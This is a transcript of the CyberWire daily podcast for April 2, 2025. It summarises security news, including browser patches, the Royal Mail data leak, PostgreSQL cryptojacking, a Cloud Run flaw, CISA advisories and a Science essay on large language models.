Chrome & Firefox squash the latest flaws.

Google and Mozilla patch nearly two dozen security flaws. The UK’s Royal Mail Group sees 144GB of data stolen and leaked. A bizarre campaign looks to recruit cybersecurity professionals to hack Chinese websites. PostgreSQL servers with weak credentials have been compromised for cryptojacking. Google Cloud patches a vulnerability affecting its Cloud Run platform. Oracle faces a class-action lawsuit over alleged cloud services data breaches. CISA releases ICS advisories detailing vulnerabilities in Rockwell Automation and Hitachi Energy products. General Paul Nakasone offers a candid assessment of America’s evolving cyber threats. On today’s CertByte segment, a look at the Cisco Enterprise Network Core Technologies exam. Are AI LLMs more like minds or mirrors? 

Today is Wednesday April 2nd 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Google and Mozilla patch nearly two dozen security flaws. 

Google and Mozilla released updates on Tuesday to patch nearly two dozen security flaws in Chrome 135 and Firefox 137. Chrome 135 includes 14 fixes, with a high-severity use-after-free bug (CVE-2025-3066) in Navigations topping the list. Google paid $18,000 in bug bounties, including $10,000 to Philipp Beer for a Custom Tabs issue. Firefox 137 addresses eight flaws, including three high-severity memory bugs that could allow code execution. Mozilla also rolled out updates for Firefox ESR and Thunderbird, covering many of the same vulnerabilities. While there’s no evidence these bugs are being exploited in the wild, both companies urge users to update promptly. Chrome 135 is now available for Linux, Windows, and macOS, while Firefox 137 is live for all supported platforms.

The UK’s Royal Mail Group sees 144GB of data stolen and leaked. 

A threat actor known as “GHNA” has leaked 144GB of data stolen from Royal Mail Group, a UK postal service and courier company,  on BreachForums, following a similar Samsung breach. Both incidents trace back to a 2021 infostealer malware infection at Spectos, a third-party data service provider. The leaked files include customer PII, internal Zoom recordings, mailing lists, delivery data, and a WordPress SQL database. Hackers are increasingly using AI to extract value from such large data dumps, enabling faster, more targeted attacks. The breach exposes deep flaws in supply chain security, showing how old stolen credentials can lead to major breaches years later. The Royal Mail incident underscores the urgent need for better third-party risk management, ongoing monitoring, and AI-aware defenses in cybersecurity strategies.

A bizarre campaign looks to recruit cybersecurity professionals to hack Chinese websites. 

A mysterious figure named “Jack” is offering up to $100,000 a month to cybersecurity professionals to hack Chinese websites using web shells. The recruitment campaign, spread via sockpuppet accounts on X (formerly Twitter), features AI-generated avatars and vague promises. The job? Hack any website registered in China—no specific targets, just volume. Jack claims to want “China’s traffic” but offers little explanation, even contradicting himself about working for the Indian government. Security experts are baffled. Some think it’s trolling, others suspect a bizarre attempt to infect Chinese users with malware. Despite its sketchiness, no one has reported phishing or malware links yet. In the words of one expert, the campaign is “persistent, widespread, and bizarre”—with no clear motive or endgame.

PostgreSQL servers with weak credentials have been compromised for cryptojacking. 

Over 1,500 PostgreSQL servers with weak credentials have been compromised by the JINX-0126 campaign, a new wave of cryptojacking linked to earlier PG_MEM malware. Attackers exploit a PostgreSQL SQL command to run system commands, kill competing miners, and deploy a binary that installs XMRig mining software. A spoofed “postmaster” binary ensures persistence and escalates privileges. According to Wiz, the campaign uses unique hashes and fileless execution to bypass detection, marking a sophisticated evolution in cloud-targeted attacks.

Google Cloud patches a vulnerability affecting its Cloud Run platform. 

Google Cloud has patched a vulnerability called ImageRunner, which affected its Cloud Run platform. Discovered by Tenable, the flaw allowed users with certain permissions to modify Cloud Run services and potentially access private container images. In the worst case, attackers could extract secrets and exfiltrate sensitive data. Google says they alerted customers in November 2024 and fully deployed a fix by January 28, 2025. The update now enforces stricter IAM checks during deployments to prevent unauthorized image access.

Elsewhere, Google has launched a beta feature allowing enterprise users to send end-to-end encrypted (E2EE) emails within their organization, with plans to expand it to all Gmail inboxes by year’s end. Unlike S/MIME, Google’s approach doesn’t require certificate management or key sharing, simplifying secure communication. Organizations retain control of encryption keys, keeping messages secure and compliant with regulations. External recipients can access messages via a restricted Gmail interface or S/MIME if supported. Additional Gmail security features, including data loss prevention and AI threat protection, are also now available.

Oracle faces a class-action lawsuit over alleged cloud services data breaches. 

Oracle is facing a class-action lawsuit in Texas over alleged data breaches tied to its cloud services. Filed by Floridian Michael Toikach and law firm Shamis & Gentile, the suit accuses Oracle of violating Texas data breach notification laws by failing to alert victims within 60 days. The case alleges that Oracle’s poor security practices led to the exposure of personal and health data, and that the company has remained silent about the breach. Toikach claims Oracle didn’t inform him of the incident, explain how it occurred, or confirm data security. He and others expect to face ongoing risks of identity theft and financial loss. The plaintiffs seek compensation and demand Oracle improve its cybersecurity practices. Oracle has yet to respond to the allegations.

CISA releases ICS advisories detailing vulnerabilities in Rockwell Automation and Hitachi Energy products. 

On April 1, 2025, CISA released two ICS advisories detailing major vulnerabilities in Rockwell Automation and Hitachi Energy products, posing risks to critical infrastructure. The Rockwell advisory (ICSA-25-091-01) warns of a deserialization flaw (CVE-2025-23120) in systems using Veeam Backup & Replication, allowing remote code execution with admin access. Patches are available. The Hitachi advisory (ICSA-24-331-04) highlights several flaws, including a critical injection vulnerability (CVE-2024-4872) in MicroSCADA Pro/X SYS600. Affected versions span 9.4 to 10.5, with fixes provided. These issues could impact manufacturing, energy, water, and chemical sectors. CISA urges immediate action—patching systems, limiting ICS exposure, and applying secure configurations. No exploitation has been reported yet, but the agency stresses urgency due to the potential for severe disruption.

General Paul Nakasone offers a candid assessment of America’s evolving cyber threats. 

In an exclusive interview with The Record, former NSA and U.S. Cyber Command chief Gen. Paul Nakasone offered a candid assessment of America’s evolving cyber threats. A year out of government, Nakasone reflected on China’s growing cyber aggression, describing the Volt and Salt Typhoon campaigns as clear signs that Beijing has surpassed Russia in capability and intent. “This is like nothing we have seen before,” he warned, pointing to Chinese intrusions in critical U.S. infrastructure.

Nakasone emphasized the urgent need for better cyber deterrence, faster defense, and stronger partnerships across government, industry, and academia. Now on the OpenAI board, he also discussed AI’s dual-use future—powerful for both offense and defense—and called for a national strategy around data, energy, semiconductors, and talent.

From AI ethics to Taiwan tensions and offensive cyber policy, Nakasone’s message was clear: the U.S. must move faster—or fall behind.

Are AI LLMs more like minds or mirrors? 

And finally, what if large AI models aren’t on the verge of becoming sentient minds—but something even more profound? In a thought-provoking reflection published in Science, a team of scholars suggests these systems are best seen not as artificial agents, but as revolutionary cultural and social technologies—akin to writing, markets, or bureaucracies.

Instead of mimicking human intelligence, these models absorb and remix the vast, messy, beautiful sprawl of human expression. Like economic prices or library catalogs, they compress and reorganize knowledge at massive scale, letting us do something astonishing: interact with the collective mind of humanity.

But here’s the twist—they reflect not just our data, but our patterns, biases, and histories. Their influence might rival that of the printing press. So, what happens next? That depends not on AI alone, but on us—how we shape it, govern it, and use it to illuminate or obscure what it means to be human.

It’s an interesting article, well worth your time. For me, it reflects the notion that as much as we hope that AI will reflect an idealized version of who we aspire to be, all too often it reveals the cold hard truth, staring back at us, warts and all. 

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com. 

N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.